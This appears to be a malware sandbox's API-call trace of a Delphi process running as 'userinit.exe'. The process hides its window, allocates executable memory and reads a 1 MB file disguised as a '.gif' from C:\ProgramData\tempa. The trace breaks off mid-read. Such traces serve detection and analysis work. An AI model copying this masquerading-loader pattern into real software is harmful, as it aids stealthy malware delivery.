[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0107.179] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0107.180] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0107.181] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0107.181] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0107.181] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0107.181] GetVersion () returned 0x1db10106
[0107.181] GetCurrentProcessId () returned 0xfa4
[0107.181] GlobalAddAtomA (lpString="Delphi00000FA4") returned 0xc146
[0107.181] GetCurrentThreadId () returned 0xfa8
[0107.181] GlobalAddAtomA (lpString="ControlOfs0040000000000FA8") returned 0xc145
[0107.181] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000FA8") returned 0xc160
[0107.181] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0107.181] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0107.181] GetSystemMetrics (nIndex=19) returned 1
[0107.208] GetSystemMetrics (nIndex=75) returned 1
[0107.208] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x621310, fWinIni=0x0 | out: pvParam=0x621310) returned 1
[0107.208] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0107.208] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0107.208] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x3022d
[0107.209] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0107.209] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0107.209] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0107.209] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x30229
[0107.209] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x3020f
[0107.209] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x301d5
[0107.209] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x301c9
[0107.209] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x301c7
[0107.210] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x301c5
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0107.210] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0107.210] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0107.210] GetDC (hWnd=0x0) returned 0x1201087d
[0107.210] GetDeviceCaps (hdc=0x1201087d, index=90) returned 96
[0107.210] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0107.210] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0107.210] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x62155c) returned 1
[0107.210] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0xcf92f, fWinIni=0x0 | out: pvParam=0xcf92f) returned 1
[0107.210] CreateFontIndirectA (lplf=0xcf92f) returned 0x220a0863
[0107.211] GetObjectA (in: h=0x220a0863, c=60, pv=0xcf720 | out: pv=0xcf720) returned 60
[0107.211] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0xcf7db, fWinIni=0x0 | out: pvParam=0xcf7db) returned 1
[0107.211] CreateFontIndirectA (lplf=0xcf8b7) returned 0x1b0a0869
[0107.211] GetObjectA (in: h=0x1b0a0869, c=60, pv=0xcf720 | out: pv=0xcf720) returned 60
[0107.211] CreateFontIndirectA (lplf=0xcf87b) returned 0x200a0864
[0107.211] GetObjectA (in: h=0x200a0864, c=60, pv=0xcf720 | out: pv=0xcf720) returned 60
[0107.211] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0107.211] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0xcf88f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0107.211] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0xcf88f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0107.211] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x60000
[0107.211] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0xcf844 | out: lpWndClass=0xcf844) returned 0
[0107.211] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0107.212] GetSystemMetrics (nIndex=0) returned 1440
[0107.212] GetSystemMetrics (nIndex=1) returned 900
[0107.212] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x401e8
[0107.264] SetWindowLongA (hWnd=0x401e8, nIndex=-4, dwNewLong=397295) returned 4219500
[0107.264] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0107.264] SendMessageA (hWnd=0x401e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0107.264] DefWindowProcA (hWnd=0x401e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0107.275] DefWindowProcA (hWnd=0x401e8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x4021b
[0107.276] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0107.276] SetClassLongA (hWnd=0x401e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0107.276] GetSystemMenu (hWnd=0x401e8, bRevert=0) returned 0x30213
[0107.278] DeleteMenu (hMenu=0x30213, uPosition=0xf030, uFlags=0x0) returned 1
[0107.278] DeleteMenu (hMenu=0x30213, uPosition=0xf000, uFlags=0x0) returned 1
[0107.278] DeleteMenu (hMenu=0x30213, uPosition=0xf010, uFlags=0x0) returned 1
[0107.279] GetKeyboardLayoutList (in: nBuff=64, lpList=0xcf810 | out: lpList=0xcf810) returned 1
[0107.279] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0107.279] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0107.280] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0107.280] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0107.280] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0107.280] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0107.280] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0107.280] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0107.280] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0107.280] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0107.280] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0107.281] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0107.281] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0107.281] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0107.281] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0107.281] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0107.281] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0107.281] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0107.281] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0107.281] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0107.281] GetCurrentThreadId () returned 0xfa8
[0107.281] GlobalAddAtomA (lpString="WndProcPtr0040000000000FA8") returned 0xc141
[0107.281] VirtualAlloc (lpAddress=0x624000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x624000
[0107.282] ShowWindow (hWnd=0x401e8, nCmdShow=0) returned 0
[0107.282] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0107.282] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0107.282] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xcf590*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xcf590*=0) returned 0x0
[0107.282] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xcf588*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xcf588*=0) returned 0x0
[0107.282] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xcf588*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xcf588*=0) returned 0x10be00
[0107.282] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xcf588*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xcf588*=0) returned 0x0
[0107.283] GlobalLock (hMem=0x580004) returned 0xe40020
[0107.283] ReadFile (in: hFile=0x98, lpBuffer=0xe40020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0xcf5a4, lpOverlapped=0x0 | out: lpBuffer=0xe40020*, lpNumberOfBytesRead=0xcf5a4*=0x10be00, lpOverlapped=0x0) returned 1
[0107.352] CloseHandle (hObject=0x98) returned 1
[0107.353] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.353] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.353] GlobalUnlock (hMem=0x58000c) returned 0
[0107.353] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4000, uFlags=0x2) returned 0x58000c
[0107.353] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.354] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.354] GlobalUnlock (hMem=0x58000c) returned 0
[0107.354] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6000, uFlags=0x2) returned 0x58000c
[0107.354] GlobalLock (hMem=0x58000c) returned 0x20a820
[0107.355] GlobalHandle (pMem=0x20a820) returned 0x58000c
[0107.355] GlobalUnlock (hMem=0x58000c) returned 0
[0107.355] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8000, uFlags=0x2) returned 0x58000c
[0107.355] GlobalLock (hMem=0x58000c) returned 0x210830
[0107.356] GlobalHandle (pMem=0x210830) returned 0x58000c
[0107.356] GlobalUnlock (hMem=0x58000c) returned 0
[0107.356] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa000, uFlags=0x2) returned 0x58000c
[0107.356] GlobalLock (hMem=0x58000c) returned 0x210830
[0107.356] GlobalHandle (pMem=0x210830) returned 0x58000c
[0107.356] GlobalUnlock (hMem=0x58000c) returned 0
[0107.356] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc000, uFlags=0x2) returned 0x58000c
[0107.357] GlobalLock (hMem=0x58000c) returned 0x21a840
[0107.358] GlobalHandle (pMem=0x21a840) returned 0x58000c
[0107.358] GlobalUnlock (hMem=0x58000c) returned 0
[0107.358] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe000, uFlags=0x2) returned 0x58000c
[0107.358] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.358] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.358] GlobalUnlock (hMem=0x58000c) returned 0
[0107.358] GlobalReAlloc (hMem=0x58000c, dwBytes=0x10000, uFlags=0x2) returned 0x58000c
[0107.358] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.359] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.359] GlobalUnlock (hMem=0x58000c) returned 0
[0107.359] GlobalReAlloc (hMem=0x58000c, dwBytes=0x12000, uFlags=0x2) returned 0x58000c
[0107.359] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.359] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.359] GlobalUnlock (hMem=0x58000c) returned 0
[0107.359] GlobalReAlloc (hMem=0x58000c, dwBytes=0x14000, uFlags=0x2) returned 0x58000c
[0107.359] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.360] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.360] GlobalUnlock (hMem=0x58000c) returned 0
[0107.360] GlobalReAlloc (hMem=0x58000c, dwBytes=0x16000, uFlags=0x2) returned 0x58000c
[0107.360] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.360] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.360] GlobalUnlock (hMem=0x58000c) returned 0
[0107.360] GlobalReAlloc (hMem=0x58000c, dwBytes=0x18000, uFlags=0x2) returned 0x58000c
[0107.360] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.361] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.361] GlobalUnlock (hMem=0x58000c) returned 0
[0107.361] GlobalReAlloc (hMem=0x58000c, dwBytes=0x1a000, uFlags=0x2) returned 0x58000c
[0107.361] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.361] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.361] GlobalUnlock (hMem=0x58000c) returned 0
[0107.361] GlobalReAlloc (hMem=0x58000c, dwBytes=0x1c000, uFlags=0x2) returned 0x58000c
[0107.361] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.361] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.362] GlobalUnlock (hMem=0x58000c) returned 0
[0107.362] GlobalReAlloc (hMem=0x58000c, dwBytes=0x1e000, uFlags=0x2) returned 0x58000c
[0107.362] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.362] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.362] GlobalUnlock (hMem=0x58000c) returned 0
[0107.362] GlobalReAlloc (hMem=0x58000c, dwBytes=0x20000, uFlags=0x2) returned 0x58000c
[0107.362] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.362] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.363] GlobalUnlock (hMem=0x58000c) returned 0
[0107.363] GlobalReAlloc (hMem=0x58000c, dwBytes=0x22000, uFlags=0x2) returned 0x58000c
[0107.364] GlobalLock (hMem=0x58000c) returned 0x226820
[0107.365] GlobalHandle (pMem=0x226820) returned 0x58000c
[0107.365] GlobalUnlock (hMem=0x58000c) returned 0
[0107.365] GlobalReAlloc (hMem=0x58000c, dwBytes=0x24000, uFlags=0x2) returned 0x58000c
[0107.365] GlobalLock (hMem=0x58000c) returned 0x226820
[0107.365] GlobalHandle (pMem=0x226820) returned 0x58000c
[0107.365] GlobalUnlock (hMem=0x58000c) returned 0
[0107.365] GlobalReAlloc (hMem=0x58000c, dwBytes=0x26000, uFlags=0x2) returned 0x58000c
[0107.367] GlobalLock (hMem=0x58000c) returned 0x24a830
[0107.368] GlobalHandle (pMem=0x24a830) returned 0x58000c
[0107.368] GlobalUnlock (hMem=0x58000c) returned 0
[0107.368] GlobalReAlloc (hMem=0x58000c, dwBytes=0x28000, uFlags=0x2) returned 0x58000c
[0107.368] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.369] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.369] GlobalUnlock (hMem=0x58000c) returned 0
[0107.369] GlobalReAlloc (hMem=0x58000c, dwBytes=0x2a000, uFlags=0x2) returned 0x58000c
[0107.369] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.369] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.369] GlobalUnlock (hMem=0x58000c) returned 0
[0107.369] GlobalReAlloc (hMem=0x58000c, dwBytes=0x2c000, uFlags=0x2) returned 0x58000c
[0107.369] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.370] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.370] GlobalUnlock (hMem=0x58000c) returned 0
[0107.370] GlobalReAlloc (hMem=0x58000c, dwBytes=0x2e000, uFlags=0x2) returned 0x58000c
[0107.370] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.370] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.370] GlobalUnlock (hMem=0x58000c) returned 0
[0107.370] GlobalReAlloc (hMem=0x58000c, dwBytes=0x30000, uFlags=0x2) returned 0x58000c
[0107.370] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.371] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.371] GlobalUnlock (hMem=0x58000c) returned 0
[0107.371] GlobalReAlloc (hMem=0x58000c, dwBytes=0x32000, uFlags=0x2) returned 0x58000c
[0107.371] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.371] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.371] GlobalUnlock (hMem=0x58000c) returned 0
[0107.371] GlobalReAlloc (hMem=0x58000c, dwBytes=0x34000, uFlags=0x2) returned 0x58000c
[0107.371] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.372] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.372] GlobalUnlock (hMem=0x58000c) returned 0
[0107.372] GlobalReAlloc (hMem=0x58000c, dwBytes=0x36000, uFlags=0x2) returned 0x58000c
[0107.372] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.372] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.372] GlobalUnlock (hMem=0x58000c) returned 0
[0107.372] GlobalReAlloc (hMem=0x58000c, dwBytes=0x38000, uFlags=0x2) returned 0x58000c
[0107.372] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.373] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.373] GlobalUnlock (hMem=0x58000c) returned 0
[0107.373] GlobalReAlloc (hMem=0x58000c, dwBytes=0x3a000, uFlags=0x2) returned 0x58000c
[0107.373] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.373] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.373] GlobalUnlock (hMem=0x58000c) returned 0
[0107.373] GlobalReAlloc (hMem=0x58000c, dwBytes=0x3c000, uFlags=0x2) returned 0x58000c
